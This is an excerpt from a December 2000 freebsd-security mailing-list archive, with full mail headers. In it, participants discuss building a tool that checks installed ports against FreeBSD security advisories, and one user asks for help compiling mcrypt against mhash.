http://www.FreeBSD.org/cgi/cvsweb.cgi/src/usr.sbin/pkg_install/version/pkg_version.pl for details on your branch. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18:43:19 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:43:16 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f25.law7.hotmail.com [216.33.237.25]) by hub.freebsd.org (Postfix) with ESMTP id 056D337B402 for ; Fri, 15 Dec 2000 18:43:16 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 15 Dec 2000 18:43:15 -0800 Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 16 Dec 2000 02:43:15 GMT X-Originating-IP: [209.53.54.44] From: "Some Person" To: jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu Cc: aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG Subject: Re: Security Update Tool.. Date: Sat, 16 Dec 2000 02:43:15 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 16 Dec 2000 02:43:15.0843 (UTC) FILETIME=[F0C8C530:01C06709] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So my idea wasn't so bad after all? :) I figure atleast it might give some ideas to those who know more than what I can do, and maybe enlighten some more ideas rooting from this. > >Hi all, > Seems like today we have 2 ideas, ports autoupdate utility ( >security checks too ) as well as for the src base itself? > > >James Lim >Technical Support Executive > >Pacific Internet Limited >89 Science Park Drive >#02-05/06 The Rutherford >Singapore 118261 > >Finger evilfry@sg.freebsd.org for PGP key. > >----- Original Message ----- >From: "Jeff Gentry" >To: "Mikhail Kruk" >Cc: "Anil Jangity" ; "jrz" ; > >Sent: Saturday, December 16, 2000 9:59 AM >Subject: Re: Security Update Tool.. > > > > On Fri, 15 Dec 2000, Mikhail Kruk wrote: > > > I'm not sure that many people would like that kind of automation, but >what > > > is really missing IMHO is ability to mark ports whichs are insecure >and > > > add some option to pkg_info which will check all installed packages. I > > > think OpenBSD has exacty this, no? > > > > I don't think it has to be automated *and* "behind the covers" ... > > I think a 2 stage process would be good -> first stage figures out what > > (if any) you need, and if possible, explains why. The 2nd stage would > > allow you to apply changes if you wanted to or not. > > > > -- > > Jeff Gentry jester@hexdump.org gentrj@hexdump.org > > SEX DRUGS UNIX > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18:50:56 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:50:55 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (poynting.physics.purdue.edu [128.210.146.58]) by hub.freebsd.org (Postfix) with ESMTP id DA75137B402 for ; Fri, 15 Dec 2000 18:50:54 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 25CE718D4; Fri, 15 Dec 2000 21:50:54 -0500 (EST) Date: Fri, 15 Dec 2000 21:50:54 -0500 From: Will Andrews To: Some Person Cc: jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu, aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: <20001215215054.I21327@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Some Person , jameslpin@pacific.net.sg, freebsd@hexdump.org, meshko@cs.brandeis.edu, aj@entic.net, jrz@cnmnetwork.com, security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 02:43:15AM +0000 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Dec 16, 2000 at 02:43:15AM +0000, Some Person wrote: > So my idea wasn't so bad after all? :) > > I figure atleast it might give some ideas to those who know more than what I > can do, and maybe enlighten some more ideas rooting from this. No, it wasn't a bad idea.. however, it's also not new. :-) Kris Kennaway asked someone to port the neato script NetBSD has in their pkgsrc for security-related updates and such, and that was a couple months ago. Maybe I'll get around to doing that, but I think I already stacked enough stuff on my todo list. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 20: 8:42 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 20:08:40 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id C95E337B400 for ; Fri, 15 Dec 2000 20:08:39 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id UAA10128; Fri, 15 Dec 2000 20:09:57 -0800 Date: Fri, 15 Dec 2000 20:09:57 -0800 From: Kris Kennaway To: Some Person Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: <20001215200957.A10030@citusc.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Dxnq1zWXvFF0Q93v" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Dxnq1zWXvFF0Q93v Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote: > My question is, is there a util yet that in theory (maybe if so, or if=20 > someone writes one would work differently than what I'm imagining) querie= s a=20 > central database with all the security advisories, checks the local syste= m=20 > for comparisons and vulnerabilities against that database and reports to = the=20 > user who ran the util. Not at present - I was talking to someone a few months ago about doing exactly this: the existing security advisories we publish contain all of the information you need to implement such a thing (at least for ports), although we'd probably need to structure them more rigidly so they can be machine-parsed. However nothing concrete has materialised yet, so there's still plenty of room for interested contributors to step up and help :-) Note that identification of vulnerabilities is different from automated correction of vulnerabilities - in order to do that it needs some fairly complicated infrastructure in the ports system to upgrade ports/packages and handle dependencies etc. Not that I want to dissuade anyone from working on this very worthy project :-) Kris --Dxnq1zWXvFF0Q93v Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OusRWry0BWjoQKURAkssAKC2aH4/AVM32jSAhv01iQS8fOYP1gCg27a6 EywiLz/klv4eZ5uK5s6g/eU= =rpuO -----END PGP SIGNATURE----- --Dxnq1zWXvFF0Q93v-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 7:23:33 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:23:29 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 64D3337B400; Sat, 16 Dec 2000 07:23:27 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JBE-00009e-00; Sat, 16 Dec 2000 17:23:24 +0200 Date: Sat, 16 Dec 2000 17:23:24 +0200 (IST) From: Roman Shterenzon To: Kris Kennaway Cc: Some Person , Subject: Re: Security Update Tool.. In-Reply-To: <20001215200957.A10030@citusc.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Dec 2000, Kris Kennaway wrote: > On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote: > > > My question is, is there a util yet that in theory (maybe if so, or if > > someone writes one would work differently than what I'm imagining) queries a > > central database with all the security advisories, checks the local system > > for comparisons and vulnerabilities against that database and reports to the > > user who ran the util. > > Not at present - I was talking to someone a few months ago about doing > exactly this: the existing security advisories we publish contain all > of the information you need to implement such a thing (at least for > ports), although we'd probably need to structure them more rigidly so > they can be machine-parsed. However nothing concrete has materialised > yet, so there's still plenty of room for interested contributors to > step up and help :-) > > Note that identification of vulnerabilities is different from > automated correction of vulnerabilities - in order to do that it needs > some fairly complicated infrastructure in the ports system to upgrade > ports/packages and handle dependencies etc. Not that I want to > dissuade anyone from working on this very worthy project :-) > > Kris I'm the person Kris was talking about. I'm working on it, have little time, and switched to gnupg lately, but it'll be done eventually. Perhaps this thread will make me finish it earlier. I'd like to hear ideas which I will incorporate in it. Meanwhile the main idea is: 1) have a local directory for advisories 2) upon start, contact freebsd.org and check for newer advisories 3) check advisories with gnupg (security officer's pgp key has to be installed manually). 4) extract the valuable information from the advisory 5) check against /var/db/pkg/* (revisions, and before it was invented - dates, yes, I know it's weak, but I've nothing to with it). 6) depending on running mode, complain or upgrade (pkg_delete; pkg_install -r) 7) anything else? Written in perl and will be called pkg_security. I guess it could be changed to sacheck if all binaries have the id in them, so using what(1) will reveal the cvs revision. Looking forward for your comments, --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 7:27:12 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:27:10 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3A6CE37B400 for ; Sat, 16 Dec 2000 07:27:09 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JES-00009v-00; Sat, 16 Dec 2000 17:26:44 +0200 Date: Sat, 16 Dec 2000 17:26:44 +0200 (IST) From: Roman Shterenzon To: Chris Faulhaber Cc: Mikhail Kruk , James Lim , Subject: Re: Security Update Tool.. In-Reply-To: <20001215201018.A90289@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Dec 2000, Chris Faulhaber wrote: > On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote: > > um... marking port forbidden will prevent you from installing it, but is > > there ability to audit ports you have already installed? > > > > Not exactly, though pkg_version(1) will tell you what packages > require updating. pkg_version works with /usr/ports/INDEX which tends to be outdated. One has to do make index in /usr/ports (and have the full ports collection) for it to work as expected, and, of course, ports-all has to be up-to-date. I was thinking more about check vs. advisories. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 7:28:25 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 07:28:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 8186A37B402 for ; Sat, 16 Dec 2000 07:28:22 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 147JFx-0000A2-00; Sat, 16 Dec 2000 17:28:17 +0200 Date: Sat, 16 Dec 2000 17:28:17 +0200 (IST) From: Roman Shterenzon To: James Lim Cc: Subject: Re: Security Update Tool.. In-Reply-To: <00a701c06704$9ae4f440$fa5e78cb@gchang> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 16 Dec 2000, James Lim wrote: > Hi all, > Seems like today we have 2 ideas, ports autoupdate utility ( > security checks too ) as well as for the src base itself? ports auto-update is BAD, BAD, BAD. 1) don't fix what's not broken 2) newer versions tend to be more bloated and more prone to bugs. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 9:44:10 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 09:44:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 523C937B402 for ; Sat, 16 Dec 2000 09:44:07 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA89235; Sat, 16 Dec 2000 18:43:56 +0100 (CET) (envelope-from des@ofug.org) Sender: des@ofug.org X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Roman Shterenzon Cc: Chris Faulhaber , Mikhail Kruk , James Lim , Subject: Re: Security Update Tool.. References: From: Dag-Erling Smorgrav Date: 16 Dec 2000 18:43:55 +0100 In-Reply-To: Roman Shterenzon's message of "Sat, 16 Dec 2000 17:26:44 +0200 (IST)" Message-ID: Lines: 18 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roman Shterenzon writes: > pkg_version works with /usr/ports/INDEX which tends to be outdated. Porteasy (ports/misc/porteasy) already knows how to: 1) update ports/INDEX 2) make do without it if it already knows the "true" name of the port 3) update individual ports and their dependencies recursively 3) obtain the full name and version of ports from their Makefiles and already has an option for listing installed ports (and marking those that don't match anything in INDEX). It could quite trivially be updated to perform pkg_version's duties as well, without relying on an out-of-date INDEX. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 11:50:55 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 11:50:53 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id F391B37B400 for ; Sat, 16 Dec 2000 11:50:52 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (2278 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 16 Dec 2000 13:50:48 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sat, 16 Dec 2000 13:50:46 -0600 (CST) From: James Wyatt To: Roman Shterenzon Cc: James Lim , security@FreeBSD.ORG Subject: Re: Security Update Tool.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 16 Dec 2000, Roman Shterenzon wrote: > On Sat, 16 Dec 2000, James Lim wrote: > > Seems like today we have 2 ideas, ports autoupdate utility ( > > security checks too ) as well as for the src base itself? > ports auto-update is BAD, BAD, BAD. > 1) don't fix what's not broken > 2) newer versions tend to be more bloated and more prone to bugs. 1) This is to fix what *is* broken, isn't it? 2) sometimes - depends on what the update does and who's developing. Many of the wuftpd updates make it better even if checking for bounds causes code bloat. (^_^) Major reconstructs commonly have more bugs than fixes, but I've seen quite a few simple updates that fix something that needed to be fixed ASAP. A smoke alarm for these could be great! Several folks have pointed-out that automagic updates would be "bad", but something that just let you know when you should look at upgrading something would be great. Some folks see how cool Windows update works, some folks see it could be deadly - it's both and we could do better. The thing I like least about it is that I can't keep a copy of the update files so I can fix several hosts or rebuild broken ones w/o going through the whole site again. I don't like automagic rebuilds of ports because several of my ports have twists in them for local alterations. For example, I needed to modify both smail and cucipop for adding whosond support to prevent relaying but allow my users to roam freely. Auto remakes would likely die on patching or screw things up more than I could quickly notice, figure out, and fix. Of course, like many, I have more ideas than patches... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 12:47: 4 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 12:47:02 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 1762337B400 for ; Sat, 16 Dec 2000 12:47:01 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 147OIH-0000Tz-00; Sat, 16 Dec 2000 13:51:01 -0700 Sender: wes@FreeBSD.ORG Message-ID: <3A3BD5B4.B1B10FEE@softweyr.com> Date: Sat, 16 Dec 2000 13:51:00 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Mikhail Kruk Cc: Anil Jangity , jrz , security@FreeBSD.ORG Subject: Re: Security Update Tool.. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mikhail Kruk wrote: > > I'm not sure that many people would like that kind of automation, but what > is really missing IMHO is ability to mark ports whichs are insecure and > add some option to pkg_info which will check all installed packages. I > think OpenBSD has exacty this, no? > > > I think he was looking for something a little more "automated". Something > > like IE's "Window's update" for freebsd ;-) > > > > I don't think its too difficult to do this, all you do is do ident on any > > binaries that are on the local system and compare the version with the > > version string in the advisories... the advisory might need some > > formatting changes? The way to keep the operating system up to date is with CVSup and make world. A tool to scan all the installed ports and compare against the current ports tree, plus security advisories for ports, would be nice. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 15:15:55 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 15:15:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.pinboard.com (mail.pinboard.com [194.209.195.7]) by hub.freebsd.org (Postfix) with ESMTP id BAF5B37B400 for ; Sat, 16 Dec 2000 15:15:51 -0800 (PST) Received: (from uucp@localhost) by mail.pinboard.com (8.9.3/8.9.3/20000102-00-KK) with UUCP id AAA09175 for freebsd-security@FreeBSD.org; Sun, 17 Dec 2000 00:15:50 +0100 (CET) (envelope-from kurt@pinboard.com (kurt@pinboard.com)) (client-IP ) Received: (from uucp@localhost) by squirrel.pbdhome.pinboard.com (8.9.1/8.9.1-19980817-01/KK) with UUCP id XAA11682 for freebsd-security@FreeBSD.org; Sat, 16 Dec 2000 23:51:49 +0100 (CET) (envelope-from: kurt@pinboard.com) Received: (from kurt@localhost) by badger.pbdhome.pinboard.com (8.9.3/8.9.3/20000829-01-KK) id XAA53898; Sat, 16 Dec 2000 23:49:11 +0100 (CET) (envelope-from kurt (kurt)) (client-IP ) Date: Sat, 16 Dec 2000 23:49:10 +0100 From: Kurt@pinboard.com To: freebsd-security@FreeBSD.org Subject: mcrypt Message-ID: <20001216234910.A14562@pinboard.com> Mail-Followup-To: Kurt@pinboard.com, freebsd-security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is probably more a C question than security, but the people here are most likely to having experience using and compiling this tool, so... I'm administering some FreeBSD machines around the world. They do not all have the same release. The need arised to being able to move and store files between the machines in a safe manner: encrypted. bdes is not available on all machines and crypt is supposedly weak and also sometimes linked against MD5 and sometimes against DES. So in order to get one tool I can use across all machines, I was looking at mcrypt (http://mcrypt.hellug.gr/). While compilation and installation of libmcrypt-2.4.7 and mhash-0.8.3 went without a problem, configure of mcrypt-2.5.5 is always complaining about not finding mhash. On solaris it was enough to set the environment variable LD_LIBRARY_PAHT to /usr/local/lib:/usr/local/lib/libmcrypt, on FreeBSD, this does not do the trick. About libtool in the mhash* and libmcrypt* directories I can't find out how to use it. I'd be grateful for hints on what I'm doing wrong. Kurt ------- some addnl info ------- # ldconfig -r | grep mhash 97:-lmhash.2 => /usr/local/lib/libmhash.so.2 # # tail -13 config.log configure:3471: gcc -o conftest -g -O2 conftest.c -lmhash 1>&5 /usr/libexec/elf/ld: cannot open -lmhash: No such file or directory configure: failed program was: #line 3460 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char mhash_keygen(); int main() { mhash_keygen() ; return 0; } # # ls -l /usr/local/lib/*mha* -rw-r--r-- 1 root wheel 261142 Dec 16 21:28 /usr/local/lib/libmhash.a -rwxr-xr-x 1 root wheel 642 Dec 16 21:28 /usr/local/lib/libmhash.la lrwxr-xr-x 1 root wheel 13 Dec 16 21:28 /usr/local/lib/libmhash.so -> libmhash.so.2 -rwxr-xr-x 1 root wheel 183296 Dec 16 21:28 /usr/local/lib/libmhash.so.2 ------- end addnl info ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 18:43:25 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 18:43:22 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f246.law7.hotmail.com [216.33.237.246]) by hub.freebsd.org (Postfix) with ESMTP id 0A95837B400; Sat, 16 Dec 2000 18:43:22 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 16 Dec 2000 18:43:21 -0800 Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sun, 17 Dec 2000 02:43:21 GMT X-Originating-IP: [209.53.54.44] From: "Some Person" To: roman@xpert.com, kris@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Update Tool.. Date: Sun, 17 Dec 2000 02:43:21 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 17 Dec 2000 02:43:21.0694 (UTC) FILETIME=[1EAF4FE0:01C067D3] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Right on! That's excellent to hear.. sacheck, well, that was just a hypothetical name I gave it. ;) So far, I can't think of much more than what you've mentioned, but I'm sure later on I will think of things especially once it's implemented and I can test it out... I'll be sure to keep your email addy handy. > >On Fri, 15 Dec 2000, Kris Kennaway wrote: > > > On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote: > > > > > My question is, is there a util yet that in theory (maybe if so, or if > > > someone writes one would work differently than what I'm imagining) >queries a > > > central database with all the security advisories, checks the local >system > > > for comparisons and vulnerabilities against that database and reports >to the > > > user who ran the util. > > > > Not at present - I was talking to someone a few months ago about doing > > exactly this: the existing security advisories we publish contain all > > of the information you need to implement such a thing (at least for > > ports), although we'd probably need to structure them more rigidly so > > they can be machine-parsed. However nothing concrete has materialised > > yet, so there's still plenty of room for interested contributors to > > step up and help :-) > > > > Note that identification of vulnerabilities is different from > > automated correction of vulnerabilities - in order to do that it needs > > some fairly complicated infrastructure in the ports system to upgrade > > ports/packages and handle dependencies etc. Not that I want to > > dissuade anyone from working on this very worthy project :-) > > > > Kris > >I'm the person Kris was talking about. I'm working on it, have little >time, and switched to gnupg lately, but it'll be done eventually. >Perhaps this thread will make me finish it earlier. >I'd like to hear ideas which I will incorporate in it. >Meanwhile the main idea is: >1) have a local directory for advisories >2) upon start, contact freebsd.org and check for newer advisories >3) check advisories with gnupg (security officer's pgp key has to be >installed manually). >4) extract the valuable information from the advisory >5) check against /var/db/pkg/* (revisions, and before it was invented - >dates, yes, I know it's weak, but I've nothing to with it). >6) depending on running mode, complain or upgrade (pkg_delete; pkg_install >-r) >7) anything else? >Written in perl and will be called pkg_security. >I guess it could be changed to sacheck if all binaries have the id in >them, so using what(1) will reveal the cvs revision. > >Looking forward for your comments, > >--Roman Shterenzon, UNIX System Administrator and Consultant >[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 22:34:16 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 22:34:14 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id 44DFE37B400 for ; Sat, 16 Dec 2000 22:34:14 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id eBH6Y9F12654 for ; Sat, 16 Dec 2000 22:34:09 -0800 (PST) Date: Sat, 16 Dec 2000 22:34:07 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My question is, is there a util yet that in theory (maybe if so, or if > someone writes one would work differently than what I'm imagining) queries a > central database with all the security advisories, checks the local system > for comparisons and vulnerabilities against that database and reports to the > user who ran the util. Before reinventing the wheel interested developers might check the reference implementation, Sun's Patchdiag: http://sunsolve.Sun.COM/private-cgi/show.pl?target=resources/patchdiag (NOTE: this URL does require a SunSolve account) -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Dec 16 23:23:10 2000 From owner-freebsd-security@FreeBSD.ORG Sat Dec 16 23:23:09 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f61.law7.hotmail.com [216.33.237.61]) by hub.freebsd.org (Postfix) with ESMTP id E410037B400 for ; Sat, 16 Dec 2000 23:23:08 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 16 Dec 2000 23:23:08 -0800 Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sun, 17 Dec 2000 07:23:08 GMT X-Originating-IP: [209.53.54.44] From: "Some Person" To: marquis@roble.com, security@FreeBSD.ORG Subject: Re: Security Update Tool.. Date: Sun, 17 Dec 2000 07:23:08 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 17 Dec 2000 07:23:08.0712 (UTC) FILETIME=[3486FA80:01C067FA] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ummm, it prompts for a username/password.. ;) >Before reinventing the wheel interested developers might check the >reference implementation, Sun's Patchdiag: > > http://sunsolve.Sun.COM/private-cgi/show.pl?target=resources/patchdiag > >(NOTE: this URL does require a SunSolve account) > >-- >Roger Marquis >Roble Systems Consulting >http://www.roble.com/ > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message